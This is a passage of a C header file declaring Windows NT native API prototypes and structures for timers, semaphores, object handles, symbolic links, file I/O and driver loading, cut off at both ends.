_TIMER_TYPE {\n NotificationTimer,\n SynchronizationTimer\n} TIMER_TYPE;\n\ntypedef enum _TIMER_INFORMATION_CLASS {\n TimerBasicInformation\n} TIMER_INFORMATION_CLASS;\n\ntypedef struct _TIMER_BASIC_INFORMATION {\n LARGE_INTEGER RemainingTime;\n BOOLEAN TimerState;\n} TIMER_BASIC_INFORMATION, *PTIMER_BASIC_INFORMATION;\n\ntypedef enum _TIMER_SET_INFORMATION_CLASS {\n TimerSetCoalescableTimer,\n MaxTimerInfoClass\n} TIMER_SET_INFORMATION_CLASS;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateTimer(\n _In_ PHANDLE TimerHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ TIMER_TYPE TimerType);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateTimer2(\n _Out_ PHANDLE TimerHandle,\n _In_opt_ PVOID Reserved1,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ ULONG Attributes,\n _In_ ACCESS_MASK DesiredAccess);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetTimer(\n _In_ HANDLE TimerHandle,\n _In_ PLARGE_INTEGER DueTime,\n _In_opt_ PTIMER_APC_ROUTINE TimerApcRoutine,\n _In_opt_ PVOID TimerContext,\n _In_ BOOLEAN WakeTimer,\n _In_opt_ LONG Period,\n _Out_opt_ PBOOLEAN PreviousState);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetTimer2(\n _In_ HANDLE TimerHandle,\n _In_ PLARGE_INTEGER DueTime,\n _In_opt_ PLARGE_INTEGER Period,\n _In_ PVOID Parameters);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetTimerEx(\n _In_ HANDLE TimerHandle,\n _In_ TIMER_SET_INFORMATION_CLASS TimerSetInformationClass,\n _Inout_updates_bytes_opt_(TimerSetInformationLength) PVOID TimerSetInformation,\n _In_ ULONG TimerSetInformationLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenTimer(\n _In_ PHANDLE TimerHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryTimer(\n _In_ HANDLE TimerHandle,\n _In_ TIMER_INFORMATION_CLASS TimerInformationClass,\n _Out_writes_bytes_(TimerInformationLength) PVOID TimerInformation,\n _In_ ULONG TimerInformationLength,\n _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCancelTimer(\n _In_ HANDLE TimerHandle,\n _Out_opt_ PBOOLEAN CurrentState);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCancelTimer2(\n _In_ HANDLE TimerHandle,\n _In_ PVOID Parameters);\n\n//ref from ph2\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateIRTimer(\n _Out_ PHANDLE TimerHandle,\n _In_ ACCESS_MASK DesiredAccess);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetIRTimer(\n _In_ HANDLE TimerHandle,\n _In_opt_ PLARGE_INTEGER DueTime);\n\n\n/************************************************************************************\n*\n* Semaphore API.\n*\n************************************************************************************/\n\ntypedef enum _SEMAPHORE_INFORMATION_CLASS {\n SemaphoreBasicInformation\n} SEMAPHORE_INFORMATION_CLASS;\n\ntypedef struct _SEMAPHORE_BASIC_INFORMATION {\n LONG CurrentCount;\n LONG MaximumCount;\n} SEMAPHORE_BASIC_INFORMATION, *PSEMAPHORE_BASIC_INFORMATION;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateSemaphore(\n _Out_ PHANDLE SemaphoreHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ LONG InitialCount,\n _In_ LONG MaximumCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenSemaphore(\n _Out_ PHANDLE SemaphoreHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQuerySemaphore(\n _In_ HANDLE SemaphoreHandle,\n _In_ SEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass,\n _Out_writes_bytes_(SemaphoreInformationLength) PVOID SemaphoreInformation,\n _In_ ULONG SemaphoreInformationLength,\n _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReleaseSemaphore(\n _In_ HANDLE SemaphoreHandle,\n _In_ LONG ReleaseCount,\n _Out_opt_ PLONG PreviousCount);\n\n/************************************************************************************\n*\n* Object and Handle API.\n*\n************************************************************************************/\ntypedef enum _OBJECT_INFORMATION_CLASS {\n ObjectBasicInformation,\n ObjectNameInformation,\n ObjectTypeInformation,\n ObjectTypesInformation,\n ObjectHandleFlagInformation,\n ObjectSessionInformation,\n ObjectSessionObjectInformation,\n ObjectSetRefTraceInformation,\n MaxObjectInfoClass\n} OBJECT_INFORMATION_CLASS;\n\ntypedef struct _OBJECT_DIRECTORY_INFORMATION {\n UNICODE_STRING Name;\n UNICODE_STRING TypeName;\n} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION;\n\ntypedef struct _OBJECT_BASIC_INFORMATION {\n ULONG Attributes;\n ACCESS_MASK GrantedAccess;\n ULONG HandleCount;\n ULONG PointerCount;\n ULONG PagedPoolCharge;\n ULONG NonPagedPoolCharge;\n ULONG Reserved[3];\n ULONG NameInfoSize;\n ULONG TypeInfoSize;\n ULONG SecurityDescriptorSize;\n LARGE_INTEGER CreationTime;\n} OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION;\n\ntypedef struct _OBJECT_NAME_INFORMATION {\n UNICODE_STRING Name;\n} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION;\n\ntypedef struct _OBJECT_TYPE_INFORMATION {\n UNICODE_STRING TypeName;\n ULONG TotalNumberOfObjects;\n ULONG TotalNumberOfHandles;\n ULONG TotalPagedPoolUsage;\n ULONG TotalNonPagedPoolUsage;\n ULONG TotalNamePoolUsage;\n ULONG TotalHandleTableUsage;\n ULONG HighWaterNumberOfObjects;\n ULONG HighWaterNumberOfHandles;\n ULONG HighWaterPagedPoolUsage;\n ULONG HighWaterNonPagedPoolUsage;\n ULONG HighWaterNamePoolUsage;\n ULONG HighWaterHandleTableUsage;\n ULONG InvalidAttributes;\n GENERIC_MAPPING GenericMapping;\n ULONG ValidAccessMask;\n BOOLEAN SecurityRequired;\n BOOLEAN MaintainHandleCount;\n ULONG PoolType;\n ULONG DefaultPagedPoolCharge;\n ULONG DefaultNonPagedPoolCharge;\n} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION;\n\ntypedef struct _OBJECT_TYPE_INFORMATION_V2 {\n UNICODE_STRING TypeName;\n ULONG TotalNumberOfObjects;\n ULONG TotalNumberOfHandles;\n ULONG TotalPagedPoolUsage;\n ULONG TotalNonPagedPoolUsage;\n ULONG TotalNamePoolUsage;\n ULONG TotalHandleTableUsage;\n ULONG HighWaterNumberOfObjects;\n ULONG HighWaterNumberOfHandles;\n ULONG HighWaterPagedPoolUsage;\n ULONG HighWaterNonPagedPoolUsage;\n ULONG HighWaterNamePoolUsage;\n ULONG HighWaterHandleTableUsage;\n ULONG InvalidAttributes;\n GENERIC_MAPPING GenericMapping;\n ULONG ValidAccessMask;\n BOOLEAN SecurityRequired;\n BOOLEAN MaintainHandleCount;\n UCHAR TypeIndex;\n CHAR ReservedByte;\n ULONG PoolType;\n ULONG DefaultPagedPoolCharge;\n ULONG DefaultNonPagedPoolCharge;\n} OBJECT_TYPE_INFORMATION_V2, *POBJECT_TYPE_INFORMATION_V2;\n\ntypedef struct _OBJECT_TYPES_INFORMATION {\n ULONG NumberOfTypes;\n} OBJECT_TYPES_INFORMATION, *POBJECT_TYPES_INFORMATION;\n\n#define OBJECT_TYPES_FIRST_ENTRY(ObjectTypes) (POBJECT_TYPE_INFORMATION)\\\n RtlOffsetToPointer(ObjectTypes, ALIGN_UP(sizeof(OBJECT_TYPES_INFORMATION), ULONG_PTR))\n\n#define OBJECT_TYPES_NEXT_ENTRY(ObjectType) (POBJECT_TYPE_INFORMATION)\\\n RtlOffsetToPointer(ObjectType, sizeof(OBJECT_TYPE_INFORMATION) + \\\n ALIGN_UP(ObjectType->TypeName.MaximumLength, ULONG_PTR))\n\ntypedef struct _OBJECT_HANDLE_FLAG_INFORMATION {\n BOOLEAN Inherit;\n BOOLEAN ProtectFromClose;\n} OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtClose(\n _In_ _Post_ptr_invalid_ HANDLE Handle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDuplicateObject(\n _In_ HANDLE SourceProcessHandle,\n _In_ HANDLE SourceHandle,\n _In_opt_ HANDLE TargetProcessHandle,\n _Out_ PHANDLE TargetHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ ULONG HandleAttributes,\n _In_ ULONG Options);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtMakePermanentObject(\n _In_ HANDLE Handle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtMakeTemporaryObject(\n _In_ HANDLE Handle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetSecurityObject(\n _In_ HANDLE Handle,\n _In_ SECURITY_INFORMATION SecurityInformation,\n _In_ PSECURITY_DESCRIPTOR SecurityDescriptor);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQuerySecurityObject(\n _In_ HANDLE Handle,\n _In_ SECURITY_INFORMATION SecurityInformation,\n _Out_writes_bytes_opt_(Length) PSECURITY_DESCRIPTOR SecurityDescriptor,\n _In_ ULONG Length,\n _Out_ PULONG LengthNeeded);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCompareObjects(\n _In_ HANDLE FirstObjectHandle,\n _In_ HANDLE SecondObjectHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryObject(\n _In_opt_ HANDLE Handle,\n _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,\n _Out_writes_bytes_opt_(ObjectInformationLength) PVOID ObjectInformation,\n _In_ ULONG ObjectInformationLength,\n _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationObject(\n _In_ HANDLE Handle,\n _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,\n _In_reads_bytes_(ObjectInformationLength) PVOID ObjectInformation,\n _In_ ULONG ObjectInformationLength);\n\ntypedef enum _WAIT_TYPE {\n WaitAll,\n WaitAny,\n WaitNotification\n} WAIT_TYPE;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWaitForSingleObject(\n _In_ HANDLE Handle,\n _In_ BOOLEAN Alertable,\n _In_opt_ PLARGE_INTEGER Timeout);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWaitForMultipleObjects(\n _In_ ULONG Count,\n _In_reads_(Count) HANDLE Handles[],\n _In_ WAIT_TYPE WaitType,\n _In_ BOOLEAN Alertable,\n _In_opt_ PLARGE_INTEGER Timeout);\n\n/************************************************************************************\n*\n* Time.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQuerySystemTime(\n _Out_ PLARGE_INTEGER SystemTime);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetSystemTime(\n _In_opt_ PLARGE_INTEGER SystemTime,\n _Out_opt_ PLARGE_INTEGER PreviousTime);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryTimerResolution(\n _Out_ PULONG MaximumTime,\n _Out_ PULONG MinimumTime,\n _Out_ PULONG CurrentTime);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetTimerResolution(\n _In_ ULONG DesiredTime,\n _In_ BOOLEAN SetResolution,\n _Out_ PULONG ActualTime);\n\n/************************************************************************************\n*\n* Directory Object API.\n*\n************************************************************************************/\n\n#define OBJDIR_FLAG_SHADOW_PRESENT 0x4\n#define OBJDIR_FLAG_SANDBOX 0x10\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateDirectoryObject(\n _Out_ PHANDLE DirectoryHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateDirectoryObjectEx(\n _Out_ PHANDLE DirectoryHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ HANDLE ShadowDirectoryHandle,\n _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenDirectoryObject(\n _Out_ PHANDLE DirectoryHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryDirectoryObject(\n _In_ HANDLE DirectoryHandle,\n _Out_writes_bytes_opt_(Length) PVOID Buffer,\n _In_ ULONG Length,\n _In_ BOOLEAN ReturnSingleEntry,\n _In_ BOOLEAN RestartScan,\n _Inout_ PULONG Context,\n _Out_opt_ PULONG ReturnLength);\n\n/************************************************************************************\n*\n* Private Namespace API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreatePrivateNamespace(\n _Out_ PHANDLE NamespaceHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ PVOID BoundaryDescriptor);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenPrivateNamespace(\n _Out_ PHANDLE NamespaceHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ PVOID BoundaryDescriptor);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDeletePrivateNamespace(\n _In_ HANDLE NamespaceHandle);\n\n/************************************************************************************\n*\n* Symbolic Link API.\n*\n************************************************************************************/\n\ntypedef enum _SYMBOLIC_LINK_INFO_CLASS {\n SymbolicLinkGlobalInformation = 1,\n SymbolicLinkAccessMask,\n MaxnSymbolicLinkInfoClass\n} SYMBOLIC_LINK_INFO_CLASS;\n\ntypedef struct _OBJECT_SYMBOLIC_LINK_V1 { //pre Win10 TH1\n LARGE_INTEGER CreationTime;\n UNICODE_STRING LinkTarget;\n ULONG DosDeviceDriveIndex;\n} OBJECT_SYMBOLIC_LINK_V1, *POBJECT_SYMBOLIC_LINK_V1;\n\ntypedef struct _OBJECT_SYMBOLIC_LINK_V2 { //Win10 TH1/TH2\n LARGE_INTEGER CreationTime;\n UNICODE_STRING LinkTarget;\n ULONG DosDeviceDriveIndex;\n ULONG Flags;\n} OBJECT_SYMBOLIC_LINK_V2, *POBJECT_SYMBOLIC_LINK_V2;\n\ntypedef struct _OBJECT_SYMBOLIC_LINK_V3 { //Win10 RS1\n LARGE_INTEGER CreationTime;\n UNICODE_STRING LinkTarget;\n ULONG DosDeviceDriveIndex;\n ULONG Flags;\n ULONG AccessMask;\n} OBJECT_SYMBOLIC_LINK_V3, *POBJECT_SYMBOLIC_LINK_V3;\n\ntypedef struct _OBJECT_SYMBOLIC_LINK_V4 { //Win10 RS2+\n LARGE_INTEGER CreationTime;\n union {\n UNICODE_STRING LinkTarget;\n struct {\n PVOID Callback;\n PVOID CallbackContext;\n };\n } u1;\n ULONG DosDeviceDriveIndex;\n ULONG Flags;\n ULONG AccessMask;\n //long __PADDING__[1];\n} OBJECT_SYMBOLIC_LINK_V4, *POBJECT_SYMBOLIC_LINK_V4; /* size: 0x0028 */\n\ntypedef struct _OBJECT_SYMBOLIC_LINK_V5 { //Win10 21H1+\n LARGE_INTEGER CreationTime;\n union {\n UNICODE_STRING LinkTarget;\n struct {\n PVOID Callback;\n PVOID CallbackContext;\n };\n } u1;\n ULONG DosDeviceDriveIndex;\n ULONG Flags;\n ULONG AccessMask;\n ULONG IntegrityLevel;\n} OBJECT_SYMBOLIC_LINK_V5, * POBJECT_SYMBOLIC_LINK_V5; /* size: 0x0028 */\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateSymbolicLinkObject(\n _Out_ PHANDLE LinkHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ PUNICODE_STRING LinkTarget);\n\nNTSYSAPI\nNTSTATUS\nWINAPI\nNtOpenSymbolicLinkObject(\n _Out_ PHANDLE LinkHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQuerySymbolicLinkObject(\n _In_ HANDLE LinkHandle,\n _Inout_ PUNICODE_STRING LinkTarget,\n _Out_opt_ PULONG ReturnedLength);\n\nNTSTATUS\nNTAPI\nNtSetInformationSymbolicLink(\n _In_ HANDLE LinkHandle,\n _In_ SYMBOLIC_LINK_INFO_CLASS SymbolicLinkInformationClass,\n _In_reads_bytes_(SymbolicLinkInformationLength) PVOID SymbolicLinkInformation,\n _In_ ULONG SymbolicLinkInformationLength);\n\n/************************************************************************************\n*\n* File API (+Driver&HotPatch).\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateFile(\n _Out_ PHANDLE FileHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_opt_ PLARGE_INTEGER AllocationSize,\n _In_ ULONG FileAttributes,\n _In_ ULONG ShareAccess,\n _In_ ULONG CreateDisposition,\n _In_ ULONG CreateOptions,\n _In_reads_bytes_opt_(EaLength) PVOID EaBuffer,\n _In_ ULONG EaLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateNamedPipeFile(\n _Out_ PHANDLE FileHandle,\n _In_ ULONG DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_ ULONG ShareAccess,\n _In_ ULONG CreateDisposition,\n _In_ ULONG CreateOptions,\n _In_ ULONG NamedPipeType,\n _In_ ULONG ReadMode,\n _In_ ULONG CompletionMode,\n _In_ ULONG MaximumInstances,\n _In_ ULONG InboundQuota,\n _In_ ULONG OutboundQuota,\n _In_opt_ PLARGE_INTEGER DefaultTimeout);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateMailslotFile(\n _Out_ PHANDLE FileHandle,\n _In_ ULONG DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_ ULONG CreateOptions,\n _In_ ULONG MailslotQuota,\n _In_ ULONG MaximumMessageSize,\n _In_ PLARGE_INTEGER ReadTimeout);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDeviceIoControlFile(\n _In_ HANDLE FileHandle,\n _In_opt_ HANDLE Event,\n _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n _In_opt_ PVOID ApcContext,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_ ULONG IoControlCode,\n _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,\n _In_ ULONG InputBufferLength,\n _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,\n _In_ ULONG OutputBufferLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtFsControlFile(\n _In_ HANDLE FileHandle,\n _In_opt_ HANDLE Event,\n _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n _In_opt_ PVOID ApcContext,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_ ULONG FsControlCode,\n _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,\n _In_ ULONG InputBufferLength,\n _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,\n _In_ ULONG OutputBufferLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenFile(\n _Out_ PHANDLE FileHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_ ULONG ShareAccess,\n _In_ ULONG OpenOptions);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReadFile(\n _In_ HANDLE FileHandle,\n _In_opt_ HANDLE Event,\n _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n _In_opt_ PVOID ApcContext,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _Out_writes_bytes_(Length) PVOID Buffer,\n _In_ ULONG Length,\n _In_opt_ PLARGE_INTEGER ByteOffset,\n _In_opt_ PULONG Key);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWriteFile(\n _In_ HANDLE FileHandle,\n _In_opt_ HANDLE Event,\n _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n _In_opt_ PVOID ApcContext,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_reads_bytes_(Length) PVOID Buffer,\n _In_ ULONG Length,\n _In_opt_ PLARGE_INTEGER ByteOffset,\n _In_opt_ PULONG Key);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLockFile(\n _In_ HANDLE FileHandle,\n _In_opt_ HANDLE Event,\n _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n _In_opt_ PVOID ApcContext,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_ PLARGE_INTEGER ByteOffset,\n _In_ PLARGE_INTEGER Length,\n _In_ ULONG Key,\n _In_ BOOLEAN FailImmediately,\n _In_ BOOLEAN ExclusiveLock);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtUnlockFile(\n _In_ HANDLE FileHandle,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_ PLARGE_INTEGER ByteOffset,\n _In_ PLARGE_INTEGER Length,\n _In_ ULONG Key);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtFlushBuffersFile(\n _In_ HANDLE FileHandle,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationFile(\n _In_ HANDLE FileHandle,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_ PVOID FileInformation,\n _In_ ULONG Length,\n _In_ FILE_INFORMATION_CLASS FileInformationClass);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDeleteFile(\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryInformationFile(\n _In_ HANDLE FileHandle,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _Out_writes_bytes_(Length) PVOID FileInformation,\n _In_ ULONG Length,\n _In_ FILE_INFORMATION_CLASS FileInformationClass);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryFullAttributesFile(\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _Out_ PFILE_NETWORK_OPEN_INFORMATION FileInformation);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryDirectoryFile(\n _In_ HANDLE FileHandle,\n _In_opt_ HANDLE Event,\n _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n _In_opt_ PVOID ApcContext,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _Out_writes_bytes_(Length) PVOID FileInformation,\n _In_ ULONG Length,\n _In_ FILE_INFORMATION_CLASS FileInformationClass,\n _In_ BOOLEAN ReturnSingleEntry,\n _In_opt_ PUNICODE_STRING FileName,\n _In_ BOOLEAN RestartScan);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryDirectoryFileEx(\n _In_ HANDLE FileHandle,\n _In_opt_ HANDLE Event,\n _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n _In_opt_ PVOID ApcContext,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _Out_writes_bytes_(Length) PVOID FileInformation,\n _In_ ULONG Length,\n _In_ FILE_INFORMATION_CLASS FileInformationClass,\n _In_ ULONG QueryFlags,\n _In_opt_ PUNICODE_STRING FileName);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryEaFile(\n _In_ HANDLE FileHandle,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _Out_writes_bytes_(Length) PVOID Buffer,\n _In_ ULONG Length,\n _In_ BOOLEAN ReturnSingleEntry,\n _In_reads_bytes_opt_(EaListLength) PVOID EaList,\n _In_ ULONG EaListLength,\n _In_opt_ PULONG EaIndex,\n _In_ BOOLEAN RestartScan);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetEaFile(\n _In_ HANDLE FileHandle,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_bytecount_(Length) PVOID Buffer,\n _In_ ULONG Length);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryVolumeInformationFile(\n _In_ HANDLE FileHandle,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _Out_writes_bytes_(Length) PVOID FsInformation,\n _In_ ULONG Length,\n _In_ FS_INFORMATION_CLASS FsInformationClass);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryQuotaInformationFile(\n _In_ HANDLE FileHandle,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _Out_writes_bytes_(Length) PVOID Buffer,\n _In_ ULONG Length,\n _In_ BOOLEAN ReturnSingleEntry,\n _In_reads_bytes_opt_(SidListLength) PVOID SidList,\n _In_ ULONG SidListLength,\n _In_opt_ PSID StartSid,\n _In_ BOOLEAN RestartScan);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetQuotaInformationFile(\n _In_ HANDLE FileHandle,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_reads_bytes_(Length) PVOID Buffer,\n _In_ ULONG Length);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReadFileScatter(\n _In_ HANDLE FileHandle,\n _In_opt_ HANDLE Event,\n _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n _In_opt_ PVOID ApcContext,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_ PFILE_SEGMENT_ELEMENT SegmentArray,\n _In_ ULONG Length,\n _In_opt_ PLARGE_INTEGER ByteOffset,\n _In_opt_ PULONG Key);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWriteFileGather(\n _In_ HANDLE FileHandle,\n _In_opt_ HANDLE Event,\n _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n _In_opt_ PVOID ApcContext,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_ PFILE_SEGMENT_ELEMENT SegmentArray,\n _In_ ULONG Length,\n _In_opt_ PLARGE_INTEGER ByteOffset,\n _In_opt_ PULONG Key);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtNotifyChangeDirectoryFile(\n _In_ HANDLE FileHandle,\n _In_opt_ HANDLE Event,\n _In_opt_ PIO_APC_ROUTINE ApcRoutine,\n _In_opt_ PVOID ApcContext,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _Out_writes_bytes_(Length) PVOID Buffer,\n _In_ ULONG Length,\n _In_ ULONG CompletionFilter,\n _In_ BOOLEAN WatchTree);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCopyFileChunk(\n _In_ HANDLE SourceHandle,\n _In_ HANDLE DestinationHandle,\n _In_opt_ HANDLE EventHandle,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_ ULONG Length,\n _In_ PLARGE_INTEGER SourceOffset,\n _In_ PLARGE_INTEGER DestOffset,\n _In_opt_ PULONG SourceKey,\n _In_opt_ PULONG DestKey,\n _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLoadDriver(\n _In_ PUNICODE_STRING DriverServiceName);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtUnloadDriver(\n _In_ PUNICODE_STRING DriverServiceName);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLoadHotPatch(\n _In_ PUNICODE_STRING HotPatchName,\n _Reserved_ ULONG LoadFlag);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtManageHotPatch(\n _In_ ULONG HotPatchInformationClass,\n _Out_writes_bytes_opt_(HotPatchInformationLength) PVOID HotPatchInformation,\n _In_ ULONG HotPatchInformationLength,\n _Out_opt_ PULONG ReturnLength);\n\n/************************************************************************************\n*\n* Section API (+MemoryPartitions).\n*\n************************************************************************************/\n\n#define MEM_EXECUTE_OPTION_ENABLE 0x1\n#define MEM_EXECUTE_OPTION_DISABLE 0x2\n#define MEM_EXECUTE_OPTION_DISABLE_THUNK_EMULATION 0x4\n#define MEM_EXECUTE_OPTION_PERMANENT 0x8\n#define MEM_EXECUTE_OPTION_EXECUTE_DISPATCH_ENABLE 0x10\n#define MEM_EXECUTE_OPTION_IMAGE_DISPATCH_ENABLE 0x20\n#define MEM_EXECUTE_OPTION_VALID_FLAGS 0x3f\n\ntypedef enum _MEMORY_PARTITION_INFORMATION_CLASS {\n SystemMemoryPartitionInformation,\n 